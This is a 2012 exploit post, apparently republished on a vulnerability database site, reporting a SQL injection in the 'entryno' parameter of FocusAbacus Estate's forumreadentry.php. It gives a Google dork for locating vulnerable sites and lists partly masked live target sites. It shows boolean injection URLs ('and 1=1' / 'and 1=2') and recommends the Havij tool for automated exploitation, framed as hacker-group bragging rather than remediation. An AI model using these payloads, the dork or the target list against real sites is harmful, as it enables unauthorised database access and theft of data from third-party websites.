FocusAbacus Estate Remote SQL Injection Vulnerability

2012.11.08
Credit: KnocKout
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:forumreadentry.php?entryno=

FocusAbacus Estate - Remote SQL Injection Vulnerability 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : mr.inj3ct0r[at]gmail.com 1 0 0 1 ######################################### 1 0 I'm KnocKout member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockoutr@msn.com [~] HomePage : 1337day.com / h4x0resec.blogspot.com / Cyber-warrior.org [~] Reference : http://h4x0resec.blogspot.com [~] Say : "Have you forgotten me, brothers and sisters?" ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : FocusAbacus Estate |~Price : N/A |~Version : ALL |~Software Official : http://www.focusabacus.net |~Vulnerability : SQL Injection |~Vulnerability Dir : / |~Risk : Critical |~Google DORK : inurl:forumreadentry.php?entryno= |[~]Date : "07.11.2012" |[~]Tested on : (focusabacus.net) Web Server: Apache/2.2.22 Powered-by: PHP/5.3.15 Sql Version: 5.1.26-rc-5.1.26rc-log ---------------------------------------------------------- forumreadentry.php <= 'entryno' Functions Not Security --------------------------------------------------------- Demo: http://www.eXXXXk.im/forumreadentry.php?entryno=1227 http://www.hyXXXXommune.com/forumreadentry.php?entryno=174 http://www.aqXXXtona.com/forumreadentry.php?entryno=1364 http://www.vnXXXat.net/forumreadentry.php?entryno=792 .. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============================================================== |{~~~~~~~~ Explotation| SQL Injection ~~~~~~~~~~}| http://www.focuXXXacus.net/forumreadentry.php?entryno=152 and 1=1 http://www.focuXXXacus.net/forumreadentry.php?entryno=152 and 1=2 Automatic It is recommended for use HAVIJ ================================================================

References:

http://h4x0resec.blogspot.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top